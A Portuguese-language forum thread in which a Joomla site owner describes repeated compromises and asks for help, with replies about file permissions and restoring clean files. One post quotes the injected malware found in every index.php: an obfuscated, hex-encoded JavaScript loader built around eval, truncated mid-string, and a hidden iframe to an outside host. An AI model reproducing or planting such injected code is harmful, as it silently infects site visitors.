Site sendo [removed] várias vezes

[gonzoxm]

Olá pessoal!
Possuo um site desenvolvido em joomla que vinha sendo alvo de ataques por diversas vezes estes ultimos meses, fiz de tudo atualizei a versão do joomla, alterei as senhas do ftp e banco de dados, etc. Mesmo assim este conseguia ser invadido.
Ontem resolvi então deletá-lo completamente deixando o directório public_html absolutamente vazio, criei um diretório chamado site e instalei o joomla 1.5.13 neste e coloquei um arquivo index na raiz redirecionando para pasta e alterei a senha do ftp colocando varios digitos entre estes números, letras maiusculas, letras minusculas e caracteres especiais.
Coloquei o site offline e não instalei nada, para minha surpresa em menos de 24 horas este já havia sido [removed] novamente? Aí então vem minha pergunta.
Terá o joomla uma falha de segurança absurda como esta? Seria o servidor? Atualmente esta hospedado na Speed Server http://www.speedserver.com.br/
O link do site é www.baraovip.com.br
Agradeço qualquer resposta

[ronildo]

Você poderia disponibilizar o log do seu site para tentarmos descobrir como está sendo feita essas invasões??

[gonzoxm]

oi Ronilson só possuo o log de hoje vou verificar com o servidor se possuem logs anteriores. Caso não possuam apagar tudo novamente e esperar para ver em quanto tempo será [removed], pelo que vi provavelmente amanhã, assim terei o log completo.
O Log está em anexo. Percebi também que este acrescentou em todas as páginas index.php o código

Code: Select all

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));
<script>c07z53='';y33e9036d4=/* y38049 */document;y33e9036d4.write('<scr'+'ipt>function yd86d6957b1(y8b8d6ccf65d)
{return e'+c07z53+'val(y8b8d6ccf65d); }</scr'+'ipt>');  function c074a21767yf0a7d3640(ya03396ba6d8){ var y71a95ff331a=16; var z44='';return (yd86d6957b1('par'+z44+'seInt')(ya03396ba6d8,y71a95ff331a));}function y633cb834ef(y600d260){ 
var ya171ced1=2; var y91fd8='';y34069='fromCh';y1b99c=String[y34069+'arCode'];for(y51599611=0;y51599611<y600d260.length;y51599611+=ya171ced1){ y91fd8+=(y1b99c(c074a21767yf0a7d3640(y600d260.substr(y51599611,ya171ced1))));}return y91fd8;} 
var yaaca98c70c2='3C7363726970743E69662821'+c07z53+'6D796961'+c07z53+'297B646F63756D656E742E777269746528756E65736361'
+c07z53+'7065282027253363253639253636253732253631'+c07z53+'253664253635253230253665253631'+c07z53
+'253664253635253364253633253330253337253230253733253732253633253364253237253638253734253734253730253361'+c07z53+
'253266253266253636253732253635253733253638253733253735253664253664253635253732253265253732253735253266253733253735253665253733253638253639253665253635253265253638253734253664253663253366253237253262253464253631'
+c07z53+'253734253638253265253732253666253735253665253634253238253464253631'+c07z53+'253734253638253265253732253631'+c07z53+
'253665253634253666253664253238253239253261'+c07z53+'253334253338253330253336253338253239253262253237253636253634253339253633253632253338253634253333253632253237253230253737253639253634253734253638253364253337253338253338253230253638253635253639253637253638253734253364253336253331'
+c07z53+'253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c07z53+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'
+c07z53+'2536642536352533652729293B7D7661'+c07z53+'72206D796961'+c07z5
<iframe src="http://x6i.ru:8080/index.php" width=186 height=111 style="visibility: hidden"></iframe>

[ronildo]

Eu acho que isso e problema de permissao, ja tive isso no meu blog, quando as pastas estavam com permissao 777, quando na verdade deveria ser 644 pra arquivos e 755 pra pastas.

Tente ver como esta suas permissoes.

E Ronildo nao Ronilson... ja e feio nao complique mais... heheheheh

[velazquez]

Já tive o mesmo problema

e pior o Infeliz colocou um script que tava derrubando o servidor dentro de um ds arquivos do core do joomla

[fititnt]

1. Faz backup de tudo, mesmo que esteja 'infectado'. Nunca se sabe.
2.Deleta tudo no servidor. Transfere arquivos novos baixados dos respectivos sites. Um modo simples de fazer isso é ver quais extensoes tinha, instalar em um outro joomla qualquer, e só copiar todos os arquivos deste outro joomla, e so editar o configuration.php.
3. Adicionar os arquivos que eram diferentes e que foram criados ( em geral só o que está na pasta /images
4. Pronto, a menos que tenha havido algum problema ou tenham alterado seu banco de dados ( algo não comum, mas também não é impossivel 0 seu site estará OK novamente, so verificar e arrumar falhas de segurança anteriores.


Também da pra checar arquivo por arquivo comparando com os do core padrão e ver diferenças. tem programas que comparam arquivos.